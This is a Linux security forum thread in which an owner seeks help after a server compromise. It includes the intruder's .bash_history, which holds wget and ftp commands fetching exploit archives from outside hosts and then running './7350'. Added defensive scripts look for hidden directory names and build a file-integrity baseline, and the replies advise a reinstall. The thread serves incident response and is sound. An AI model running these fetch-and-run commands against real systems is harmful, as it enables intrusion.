Linux - Security (LinuxQuestions.org forum)
This forum is for all security-related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
Please help. I am a newbie at this and I believe my server has been compromised.
Thus far, only I have access to this server and it has been online for about a month now. There are very few users in /home and I use them all myself. There was this one user that I had not logged into for a while, and then when I tried to log in, I suddenly found that I couldn't. I didn't suspect a thing until about a week or two later.
This is what I have found out so far. I hope someone is able to help me figure out what has been done to my box.
Here is the user's .bash_history:
w
exit
w
cd /tmp
ls
wget
wget
wget LoveIulia.home.ro/7350wurmxpl.tgz
wget 65.113.119.149/fanelove/ana/7350wurmxpl.tgz
wget ps-lov.us/local.tgz
wget ps-lov.us/local.tgz
killall -9 -vq wget
wget vampix.go.ro/brk
ftp -v BuGsJr.dap.ro
dap.ro
ftp -v dap.ro
bye
killall -9 -vq ftp
ftp -v dap.ro
ftp -v BuGsJr.dap.ro
ls
killall -9 -vq ftp
tar xzvf 7350wurmxpl.tgz
./7350
w
cd "/ /"
clear
cd /tmp
ls
./7350
w
cd "// "
cd /tmp
clear
ls
wget paradis.home.ro/partys
killall -9 -vq wget
killall -9 -vq wget
clear
ls -a
free
cat /proc/cpuinfo
wget LoveIulia.home.ro/p.tar.gz
clearls
ps ax
killall -9 -vq ftp
killall -9 -vq wget
clearlsclear
;ls
clear
ls
./7350
w
cd "// "
clear
ls
w
cd /etc/nmh/...
clear
ls
cd /tmp
ls
./7350
w
cd /tmp
ls
w
cd "// "
clear
cd /tmp
ls
w
./7350
passwd
passwd
exit
passwd
----------------------------------
I'm not sure if he modified his .bash_history, but this is all I have above.
----------------------------------
Then I went into /etc/nmh/ and found this when I did an "ls -al":
-rw-r--r-- 1 root root 26 Jun 25 2001 components
-rw-r--r-- 1 root root 275 Jun 25 2001 digestcomps
-rw-r--r-- 1 root root 22 Jun 25 2001 distcomps
-rw-r--r-- 1 root root 26 Jun 25 2001 forwcomps
-rw-r--r-- 1 root root 1153 Jun 25 2001 MailAliases
-rw-r--r-- 1 root root 46 Jun 25 2001 mhl.body
-rw-r--r-- 1 root root 193 Jun 25 2001 mhl.digest
-rw-r--r-- 1 root root 379 Jun 25 2001 mhl.format
-rw-r--r-- 1 root root 284 Jun 25 2001 mhl.forward
-rw-r--r-- 1 root root 415 Jun 25 2001 mhl.headers
-rw-r--r-- 1 root root 122 Jun 25 2001 mhl.reply
-rw-r--r-- 1 root root 856 Jun 25 2001 mhn.defaults
-rw-r--r-- 1 root root 984 Jun 25 2001 mts.conf
-rw-r--r-- 1 root root 84 Jun 25 2001 rcvdistcomps
-rw-r--r-- 1 root root 104 Jun 25 2001 rcvdistcomps.outbox
-rw-r--r-- 1 root root 756 Jun 25 2001 replcomps
-rw-r--r-- 1 root root 965 Jun 25 2001 replgroupcomps
-rw-r--r-- 1 root root 455 Jun 25 2001 scan.default
-rw-r--r-- 1 root root 273 Jun 25 2001 scan.mailx
-rw-r--r-- 1 root root 450 Jun 25 2001 scan.MMDDYY
-rw-r--r-- 1 root root 378 Jun 25 2001 scan.nomime
-rw-r--r-- 1 root root 245 Jun 25 2001 scan.size
-rw-r--r-- 1 root root 284 Jun 25 2001 scan.time
-rw-r--r-- 1 root root 404 Jun 25 2001 scan.timely
-rw-r--r-- 1 root root 252 Jun 25 2001 scan.unseen
-rw-r--r-- 1 root root 473 Jun 25 2001 scan.YYYYMMDD
I ran "cat" on some of the files and I believe it's some spammer's tool or something.
---------------------------------------
I have changed the password for the compromised user and disabled login. However, I do not know what he/she has done to my server. Could someone please help me figure out what to do next, as I am at a loss as to what to do.
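A triage aid for the history posted above, added here as an example and not part of the original thread. The attacker's commands `cd "/ /"`, `cd "// "` and `cd /etc/nmh/...` point at directories whose names are made only of dots and spaces; `ls -al` prints such a directory right after `.` and `..`, where it is easy to skim past (the listing posted above has no dot entries at all, so a `...` entry would not show up in it as given). The script below walks a tree and reports every name that survives only as dots and spaces. The fixture tree is constructed inside the script so it runs offline; the paths in it are modelled on the history, not taken from the poster's real filesystem. On a real box you would run it from trusted media, since a trojaned `find` could lie.

```shell
#!/bin/sh
# Added example (not from the thread): hunt for directory and file names
# that consist solely of '.' and ' ' characters, the hiding trick seen in
# the posted .bash_history ("/etc/nmh/...", "// ", "/ /").

# Build a constructed fixture tree under a temp dir and print its path.
# Nothing here is the poster's data; the names mirror the history above.
make_fixture() {
  root=$(mktemp -d)
  # Legitimate-looking entries, including the stock nmh config directory.
  mkdir -p "$root/etc/nmh" "$root/tmp" "$root/home/user"
  touch "$root/etc/nmh/components" "$root/etc/nmh/mts.conf"
  touch "$root/home/user/.bash_history" "$root/tmp/7350wurmxpl.tgz"
  # Stash locations of the kind the attacker used: dots-only and
  # space-only names, plus a mixed "dot dot space dot" name.
  mkdir -p "$root/etc/nmh/..." "$root/ " "$root/usr/lib/.. ."
  touch "$root/etc/nmh/.../brk"
  printf '%s\n' "$root"
}

# Print every path under $1 whose basename is made only of '.' and ' '.
# "." and ".." never appear in find output for children, so anything
# printed here is a deliberately odd name worth inspecting.
find_odd_names() {
  find "$1" -print | while IFS= read -r p; do
    [ "$p" = "$1" ] && continue          # skip the search root itself
    name=${p##*/}
    # Strip every dot and space; a legitimate name leaves something behind.
    rest=$(printf '%s' "$name" | tr -d '. ')
    if [ -z "$rest" ]; then
      printf '%s\n' "$p"
    fi
  done
}

# Stand-alone run: build the fixture, report, clean up.
if [ "${0##*/}" != "sh" ] && [ -z "${NO_MAIN:-}" ]; then
  fixture=$(make_fixture)
  echo "Suspicious names under $fixture:"
  find_odd_names "$fixture"
  rm -rf "$fixture"
fi
```

Extend the `tr -d` set with tabs if your locale allows them in file names; the idea is the same. Pair this with `ls -la` on the directories it reports, and with a review of `/tmp`, `/var/tmp` and `/dev` for world-writable stash points.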
Well, '.ro' is Romania, wurmxpl leads to a Latvian site (.lv), and the ps-lov.us is a Linux virus, see: http://seclists.org/lists/fulldisclo.../Oct/0341.html
Basically, I'd recommend re-installing from a known good backup, i.e. go as far back as necessary, and then make sure you have a good firewall etc. set up.
Test against your machine using nmap (www.insecure.org), nessus (www.nessus.org) and consider using Tripwire (www.tripwire.org), and the hardening script(s) from www.bastille-linux.org.
It's just too risky to try and cleanup...
Hi chrism01, thanks for the quick response. As I do more detective work, I just found out that the server was compromised on Aug 3 and my firewall was only up on Aug 13.
With the backdoor that comes with the ps-lov.us virus, do you think they still have a backdoor to the server since the firewall has been up?
That's only the stuff we know about... there could be any number of other things done to you, e.g. replacing ps with a trojaned version. I'm afraid I can only recommend a complete re-install. There's no other way to be sure your system is clean.
You may want to read the Security References thread for recommendations / howtos on how to secure your system.
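Both of chrism01's replies above come down to the same point: once `ps`, `ls` or `find` may have been swapped for trojaned copies, nothing the host reports about itself can be trusted, and the only way to know what changed is to compare against a record taken before the break-in. That is what Tripwire does. The script below is an added example, not part of the thread and not Tripwire's own code: a minimal baseline-and-compare in POSIX sh using SHA-256 digests. The fixture is a constructed directory tree standing in for `/bin` and `/sbin`; the "rootkit" function simulates exactly the scenario described (ps replaced, a new binary dropped, a file deleted). Two caveats a practitioner should keep in mind: the baseline must be taken while the system is known good and kept off the host (read-only media), and the comparison must be run with tools from trusted media, since on a compromised box `sha256sum` itself may lie.

```shell
#!/bin/sh
# Added example (not from the thread): a minimal Tripwire-style integrity
# baseline. Records path and SHA-256 per regular file, then reports
# CHANGED / MISSING / NEW against a later snapshot of the same tree.

hash_file() {
  # coreutils sha256sum on Linux; shasum on BSD/macOS.
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# baseline DIR  -> "path<TAB>sha256" lines on stdout, sorted for stable diffs.
baseline() {
  find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
    printf '%s\t%s\n' "$f" "$(hash_file "$f")"
  done
}

# compare BASELINE_FILE DIR -> prints drift, returns 1 if any drift found.
compare() {
  base=$1; dir=$2; rc=0
  tab=$(printf '\t')
  now=$(mktemp)
  baseline "$dir" > "$now"
  # Files present in the baseline: changed or missing now?
  while IFS="$tab" read -r path sum; do
    cur=$(awk -F'\t' -v p="$path" '$1==p{print $2}' "$now")
    if [ -z "$cur" ]; then
      printf 'MISSING %s\n' "$path"; rc=1
    elif [ "$cur" != "$sum" ]; then
      printf 'CHANGED %s\n' "$path"; rc=1
    fi
  done < "$base"
  # Files present now that the baseline never saw.
  while IFS="$tab" read -r path sum; do
    if ! awk -F'\t' -v p="$path" '$1==p{found=1} END{exit !found}' "$base"; then
      printf 'NEW %s\n' "$path"; rc=1
    fi
  done < "$now"
  rm -f "$now"
  return $rc
}

# Constructed fixture standing in for a small /bin and /sbin (not real binaries).
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/bin" "$d/sbin"
  printf 'original ps\n'   > "$d/bin/ps"
  printf 'original ls\n'   > "$d/bin/ls"
  printf 'original init\n' > "$d/sbin/init"
  printf '%s\n' "$d"
}

# Simulate the scenario in the thread: ps trojaned, a new binary dropped,
# a file removed. Purely a stand-in; no real rootkit behaviour.
simulate_rootkit() {
  printf 'hides attacker processes\n' > "$1/bin/ps"
  printf 'backdoor\n' > "$1/bin/brk"
  rm -f "$1/sbin/init"
}

# Stand-alone run: baseline a clean tree, tamper with it, show the drift.
if [ -z "${NO_MAIN:-}" ]; then
  tree=$(make_fixture); snap=$(mktemp)
  baseline "$tree" > "$snap"
  simulate_rootkit "$tree"
  compare "$snap" "$tree" || echo "integrity check FAILED (expected here)"
  rm -rf "$tree" "$snap"
fi
```

On a real host you would baseline `/bin`, `/sbin`, `/usr/bin`, `/usr/sbin`, `/lib` and `/etc` right after a clean install, before the box goes on the network, and store the snapshot off-host; Tripwire adds mode, owner and inode checks and signs its database, which this sketch leaves out.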
Hi Chris,
Thanks for the reply. Yeah, I guess I was still a little hopeful last night, when I had just discovered the breach. Now I've come to my senses, and what you say is right: a complete re-install would be best, as we don't really know what other system files they could have modified.
Thanks for the pointer on the Security References thread. I think I'll need to plough through it before I put my server online again. Good thing it wasn't in production yet.